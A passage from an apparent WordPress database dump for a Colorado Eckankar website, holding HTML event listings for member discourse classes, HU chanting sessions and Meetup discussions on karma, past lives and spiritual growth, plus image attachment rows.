11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-20#038;p=262905',0,'tribe_events','',0),(262969,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-07-18','','','2020-12-09 11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-18#038;p=262905',0,'tribe_events','',0),(262970,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-08-15','','','2020-12-09 11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-15#038;p=262905',0,'tribe_events','',0),(262971,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-09-19','','','2020-12-09 11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-19#038;p=262905',0,'tribe_events','',0),(262972,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-10-17','','','2020-12-09 11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-17#038;p=262905',0,'tribe_events','',0),(262986,0,'2020-12-20 10:46:21','2020-12-20 17:46:21','','','','publish','closed','closed','','262986','','','2020-12-20 10:46:21','2020-12-20 17:46:21','',0,'https://eckankar-colorado.org/nf_sub/262986/',0,'nf_sub','',0),(262987,0,'2020-12-23 18:56:50','2020-12-24 01:56:50','','','','publish','closed','closed','','262987','','','2020-12-23 18:56:50','2020-12-24 01:56:50','',0,'https://eckankar-colorado.org/nf_sub/262987/',0,'nf_sub','',0),(262989,2,'2020-12-23 20:37:16','2020-12-24 03:37:16','<p><strong><span style=\"font-size: 20pt; color: #f28a27;\">Turning Points - a Gift of Growth</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 13pt;\"><strong>• Do you want to grasp spirit’s personal message for you today?</strong></span></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>• Do you wonder how to find the gift hidden in each challenge you face?</strong></span></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>• Would you like to discover the turning points in your own life?</strong></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\"><strong><br />\r\n“<em>Old assumptions make us what we are, and those that hold us back from any sort of success are the hardest to recognize and correct. But it can be done.</em>”</strong></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\"><strong>“<em>A turning point is life’s way of giving you a chance to move ahead spiritually, though you must reach for the gift yourself.</em>”</strong></span><br />\r\n<span style=\"font-size: 12pt;\">- Quotes above by Harold Klemp, from the <a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_oct2020.pdf\" target=\"_blank\" rel=\"noopener\"><em>Spiritual Wisdom Journal</em> </a>referenced below. Every experience in your life is an opportunity to grow spiritually.</span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\">Your own perspective on whether the experience is a stumbling block or a stepping stone is the key. What will you choose? Will you react based on old assumptions or accept spirit’s challenge to shift to a higher perspective today?</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">One way to make this shift is to open your heart by singing HU. There will be an opportunity to try this spiritual exercise when we gather online.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Join us for the online discussion where you can choose to share your ideas or just listen as others share their journey to recognize and grow from the turning points in their own lives. The discussion will be based on participants experience and content from the ECKANKAR Spiritual Wisdom Journal titled “Turning Points- a Gift of Growth”.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Spiritual Wisdom Journal titled, “<strong>Turning Points- a Gift of Growth</strong>” includes the experiences of people who have discovered the turning points in their own lives and gained new insight into themselves. It also contains a spiritual exercise you are welcome to try. This free publication can be viewed or downloaded at:  <strong><a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_oct2020.pdf\" target=\"_blank\" rel=\"noopener\">Spiritual Wisdom Journal</a></strong><br />\r\n</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275333028/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT<br>Turning Points - a Gift of Growth','','publish','closed','closed','','meetup-virtual-online-event-soul-adventures-series-dreams-and-their-spiritual-meaning','','','2020-12-28 13:02:58','2020-12-28 20:02:58','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262989',0,'tribe_events','',0),(262990,2,'2020-12-23 20:35:12','2020-12-24 03:35:12','','seashell-1','','inherit','closed','closed','','seashell-1','','','2020-12-23 20:35:12','2020-12-24 03:35:12','',262989,'https://eckankar-colorado.org/wp-content/uploads/2020/12/seashell-1.jpg',0,'attachment','image/jpeg',0),(263006,2,'2020-12-23 20:53:58','2020-12-24 03:53:58','<p><strong><span style=\"font-size: 20pt; color: #f28a27;\">Turning Points - a Gift of Growth</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 13pt;\"><strong>• Do you want to grasp spirit’s personal message for you today?</strong></span></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>• Do you wonder how to find the gift hidden in each challenge you face?</strong></span></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>• Would you like to discover the turning points in your own life?</strong></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\"><strong><br />\r\n“<em>Old assumptions make us what we are, and those that hold us back from any sort of success are the hardest to recognize and correct. But it can be done.</em>”</strong></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\"><strong>“<em>A turning point is life’s way of giving you a chance to move ahead spiritually, though you must reach for the gift yourself.</em>”</strong></span><br />\r\n<span style=\"font-size: 12pt;\">- Quotes above by Harold Klemp, from the <a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_oct2020.pdf\" target=\"_blank\" rel=\"noopener\"><em>Spiritual Wisdom Journal</em> </a>referenced below. Every experience in your life is an opportunity to grow spiritually.</span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\">Your own perspective on whether the experience is a stumbling block or a stepping stone is the key. What will you choose? Will you react based on old assumptions or accept spirit’s challenge to shift to a higher perspective today?</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">One way to make this shift is to open your heart by singing HU. There will be an opportunity to try this spiritual exercise when we gather online.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Join us for the online discussion where you can choose to share your ideas or just listen as others share their journey to recognize and grow from the turning points in their own lives. The discussion will be based on participants experience and content from the ECKANKAR Spiritual Wisdom Journal titled “Turning Points- a Gift of Growth”.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Spiritual Wisdom Journal titled, “<strong>Turning Points- a Gift of Growth</strong>” includes the experiences of people who have discovered the turning points in their own lives and gained new insight into themselves. It also contains a spiritual exercise you are welcome to try. This free publication can be viewed or downloaded at:  <strong><a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_oct2020.pdf\" target=\"_blank\" rel=\"noopener\">Spiritual Wisdom Journal</a></strong><br />\r\n</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275333079/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT<br>Turning Points - a Gift of Growth','','publish','closed','closed','','meetup-virtual-online-eventturning-points-a-gift-of-growth','','','2020-12-28 13:02:46','2020-12-28 20:02:46','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263006',0,'tribe_events','',0),(263009,0,'2020-12-25 19:44:33','2020-12-26 02:44:33','','','','publish','closed','closed','','263009','','','2020-12-25 19:44:33','2020-12-26 02:44:33','',0,'https://eckankar-colorado.org/nf_sub/263009/',0,'nf_sub','',0),(263018,2,'2020-12-27 15:47:29','2020-12-27 22:47:29','<p><span style=\"font-size: 20pt; color: #f28a27;\">Have you wondered about your own past lives?</span></p>\r\n<p><strong><span style=\"font-size: 12pt;\">Would you like to know how the meticulous Law of Karma and later, the overriding Law of Love set the conditions of your birth?</span></strong></p>\r\n<p><strong><span style=\"font-size: 12pt;\">Would you like to learn how to find the spiritual guidance to shape your own tomorrow; to be the captain of your own life</span></strong>?</p>\r\n<p><span style=\"font-size: 12pt;\"><strong>The choices you’ve made in the past are the direct cause of all your happiness (or unhappiness) today. We often see how and why individuals make good and bad choices.</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Soul enters this world to pursue a series of tasks, for each is an exercise in spiritual purification. Taken as a whole, these assignments make up one’s destiny. To set the tone for Its mission, Soul enters a new lifetime with a body of strength or weakness, of great intellect or a simple mind, in a popular shade of skin or not, either as a male or a female, into wealth or poverty.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Free will can offset or even overcome the drawbacks of destiny, but only through the awakening of one’s consciousness. One may thus reshape both his material and spiritual life.</span></p>\r\n<p><strong><span style=\"font-size: 12pt;\">Reference:</span></strong><br />\r\n<em><span style=\"font-size: 12pt;\">\'Spiritual Wisdom on Karma and Reincarnation\'  </span></em><span style=\"font-size: 12pt;\">— by Harold Klemp</span><br />\r\n<span style=\"font-size: 12pt;\"><a class=\"link\" title=\"https://www.eckbooks.org/items/-1097-0.html\" href=\"https://www.eckbooks.org/items/-1097-0.html\" target=\"__blank\" rel=\"noopener\">https://www.eckbooks.org/items/-1097-0.html</a></span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/275177828/?rv=ea1_v2&amp;_xtd=gatlbWFpbF9jbGlja9oAJGMxYTRmMjdkLTQxMzEtNGEyOC04ZTMyLWIxNzUwZjE3ZTFlNA&amp;utm_campaign=event-announce&amp;utm_medium=email&amp;utm_source=promo\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT<br>Past Lives Present Lessons: <br> Breaking Free of Karma','','publish','closed','closed','','meetup-virtual-online-eventpast-lives-present-lessons-how-to-break-free-from-the-bonds-of-karma','','','2021-01-01 15:43:20','2021-01-01 22:43:20','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263018',0,'tribe_events','',0),(263019,2,'2020-12-27 15:46:42','2020-12-27 22:46:42','','kayak-star','','inherit','closed','closed','','kayak-star','','','2020-12-27 15:46:42','2020-12-27 22:46:42','',263018,'https://eckankar-colorado.org/wp-content/uploads/2020/12/kayak-star.jpg',0,'attachment','image/jpeg',0),(263026,2,'2020-12-27 16:16:13','2020-12-27 23:16:13','<!-- EVENT #1 -->\r\n<p><span style=\"color: #f28a27; font-size: 18pt;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"color: #666666; font-size: 12pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666; font-size: 12pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<!-- EVENT #2 -->','ZOOM VIRTUAL EVENT <br> Experience the Sound Of Soul <br> Register Now!','','publish','closed','closed','','zoom-virtual-event-experience-the-sound-of-soul-register-now','','','2020-12-28 13:19:27','2020-12-28 20:19:27','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263026',0,'tribe_events','',0),(263088,2,'2020-12-28 14:56:34','0000-00-00 00:00:00','','Mountain Areas','','draft','closed','closed','','','','','2020-12-28 14:56:34','2020-12-28 21:56:34','',0,'https://eckankar-colorado.org/?post_type=tabs_responsive&#038;p=263088',0,'tabs_responsive','',0),(263107,2,'2020-12-29 10:12:39','2020-12-29 17:12:39','','mountain-area-member-cal-promo','','inherit','closed','closed','','mountain-area-member-cal-promo','','','2020-12-29 10:12:39','2020-12-29 17:12:39','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg',0,'attachment','image/jpeg',0),(263172,0,'2020-12-30 23:57:09','2020-12-31 06:57:09','','','','publish','closed','closed','','263172','','','2020-12-30 23:57:09','2020-12-31 06:57:09','',0,'https://eckankar-colorado.org/nf_sub/263172/',0,'nf_sub','',0),(263177,2,'2021-01-01 15:10:48','2021-01-01 22:10:48','<p><span style=\"font-size: 20pt; color: #f28a27;\">Do you know that the Divine speaks to us through Sound?</span></p>\r\n<p><span style=\"font-size: 20pt; color: #f28a27; line-height: 0.6;\">What is this Sound and how can it help you?</span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong><br />\r\nHave you heard the God sound in your everyday life? Is it always there?</strong></span><br />\r\n<span style=\"font-size: 12pt;\"><strong>Do you know how to tune into the God Sound and the wisdom and love that it brings?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Harold Klemp says “It is the sound of all sounds. It is the wind in the leaves, falling rain, thunder of jets, singing of birds, the awful rumble of a tornado. Again Its sound is heard in laughter, weeping, the din of city traffic, ocean waves, and the quiet rippling of a mountain stream.”</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Come experience the Sound of God for yourself at this Meetup. It is our goal that each of you will have a direct experience with the God sound.</span><br />\r\n<span style=\"font-size: 12pt;\">We will offer multiple exercises to practice hearing the Sound of God. Each exercise will begin with an inspirational quote, followed by a brief discussion after the exercise is completed.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">You may wish to bring a journal or paper to record your experiences and insights. Take this opportunity to tune into the God Sound in a whole new way!</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\">TheSoundofSoul.org</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275451327/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT<br>12 Secrets of Spiritual Living: Discover the God Sound','','publish','closed','closed','','meetup-virtual-online-event12-secrets-of-spiritual-living-discover-the-god-sound','','','2021-01-01 15:41:13','2021-01-01 22:41:13','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263177',0,'tribe_events','',0),(263178,2,'2021-01-01 15:10:07','2021-01-01 22:10:07','','water-ripples-1','','inherit','closed','closed','','water-ripples-1','','','2021-01-01 15:10:07','2021-01-01 22:10:07','',263177,'https://eckankar-colorado.org/wp-content/uploads/2021/01/water-ripples-1.jpg',0,'attachment','image/jpeg',0),(263189,2,'2021-01-01 15:43:08','2021-01-01 22:43:08','','machu-pichu-1','','inherit','closed','closed','','machu-pichu-1','','','2021-01-01 15:43:08','2021-01-01 22:43:08','',263018,'https://eckankar-colorado.org/wp-content/uploads/2020/12/machu-pichu-1.jpg',0,'attachment','image/jpeg',0),(263190,2,'2021-01-01 15:50:11','2021-01-01 22:50:11','','eck-temple-co-nd-2','','inherit','closed','closed','','eck-temple-co-nd-2','','','2021-01-01 15:50:11','2021-01-01 22:50:11','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/01/eck-temple-co-nd-2.jpg',0,'attachment','image/jpeg',0),(263196,2,'2021-01-01 16:58:19','2021-01-01 23:58:19','','OLYMPUS DIGITAL CAMERA','OLYMPUS DIGITAL CAMERA','inherit','closed','closed','','olympus-digital-camera-5','','','2021-01-01 16:58:19','2021-01-01 23:58:19','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/01/loveland-center-nd-2.jpg',0,'attachment','image/jpeg',0),(263203,2,'2021-01-02 20:42:17','2021-01-03 03:42:17','<p><strong><span style=\"font-size: 20pt; color: #f28a27;\">Your Spiritual Toolkit</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>Each of us is connected to God through Divine Spirit (the ECK), which can be heard as Sound and seen as Light. Eckankar offers a spiritual toolkit to help you experience the Light and Sound of God.</strong></span></p>\r\n<p><br />\r\n<strong><span style=\"font-size: 12pt;\">Discover:</span></strong><br />\r\n<span style=\"font-size: 12pt;\">• Simple daily spiritual exercises that can give you the experience of the Sound behind all sounds, and the pure Light of God;</span><br />\r\n<span style=\"font-size: 12pt;\">• Techniques for personal experience with dreams, past lives, Soul Travel, and your spiritual destiny.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This month\'s discussion is based on the booklet, \"<em>Spiritual Wisdom on Conquering Fear</em>\" by Sri Harold Klemp. Booklet is free, and available by request at this discussion.</span></p>\r\n<p><br />\r\n<a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofBV/events/275380236/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT<br>Spiritual Wisdom on Conquering Fear','','publish','closed','closed','','meetup-virtual-online-eventspiritual-wisdom-on-conquering-fear','','','2021-01-02 20:46:03','2021-01-03 03:46:03','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263203',0,'tribe_events','',0),(263204,2,'2021-01-02 20:41:52','2021-01-03 03:41:52','','eck-wisdom-conquer-fear','','inherit','closed','closed','','eck-wisdom-conquer-fear','','','2021-01-02 20:41:52','2021-01-03 03:41:52','',263203,'https://eckankar-colorado.org/wp-content/uploads/2021/01/eck-wisdom-conquer-fear.jpg',0,'attachment','image/jpeg',0),(263208,2,'2021-01-03 20:13:48','2021-01-04 03:13:48','<p><strong><span style=\"font-size: 20pt; color: #f28a27;\">You are Soul. An eternal spark of the Divine.</span></strong></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>What spiritual sights have you set for yourself?</strong></span></p>\r\n<p><span style=\"font-size: 13pt;\"><strong> What heights would you like to reach?</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">In this recorded 1992 talk, the Spiritual Leader of ECKANKAR, Harold Klemp, focuses on ECK masters, equality, and past life therapy in light of spiritual freedom as a high spiritual goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">As we listen to the talk, we can drink in the perspective of someone who has walked the journey to spiritual freedom. We can become better acquainted with the role of ECK masters. We can see how karma and spiritual freedom differ.</span></p>\r\n<p><span style=\"font-size: 12pt;\">With freedom comes responsibility. We let go of ourselves as “victim” or as better than others or less than others.</span></p>\r\n<p><span style=\"font-size: 12pt;\">We take steps to master our own lives. We dream and create. We become the person we truly want to be.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Please join us as we share our spiritual views on these important topics. All will get spiritual benefit.</span><br />\r\n<span style=\"font-size: 12pt;\">All are welcome. The Zoom link will be shared once you RSVP.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Sponsored by ECKANKAR as a community service, there is never a fee to attend our meetup.</span></p>\r\n<p><strong><span style=\"font-size: 12pt;\"> <br />\r\n</span></strong><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275527901/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT<br>ECK Masters, Spiritual Freedom, and Past Lives','','publish','closed','closed','','meetup-virtual-online-eventfemale-eck-masters-equality-and-past-life-therapy','','','2021-01-09 19:17:44','2021-01-10 02:17:44','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263208',0,'tribe_events','',0),(263213,0,'2021-01-03 20:25:30','2021-01-04 03:25:30','','','','publish','closed','closed','','263213','','','2021-01-03 20:25:30','2021-01-04 03:25:30','',0,'https://eckankar-colorado.org/nf_sub/263213/',0,'nf_sub','',0),(263214,0,'2021-01-04 07:38:26','2021-01-04 14:38:26','','','','publish','closed','closed','','263214','','','2021-01-04 07:38:26','2021-01-04 14:38:26','',0,'https://eckankar-colorado.org/nf_sub/263214/',0,'nf_sub','',0),(263215,0,'2021-01-04 14:55:40','2021-01-04 21:55:40','','','','publish','closed','closed','','263215','','','2021-01-04 14:55:40','2021-01-04 21:55:40','',0,'https://eckankar-colorado.org/nf_sub/263215/',0,'nf_sub','',0),(263232,2,'2021-01-14 12:55:01','2021-01-14 19:55:01','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 2 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Dream 2 Discourses','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series','','','2021-01-14 14:35:16','2021-01-14 21:35:16','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263232',0,'tribe_events','',0),(263245,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2020-12-06','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2020-12-06#038;p=225018',0,'tribe_events','',0),(263246,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this 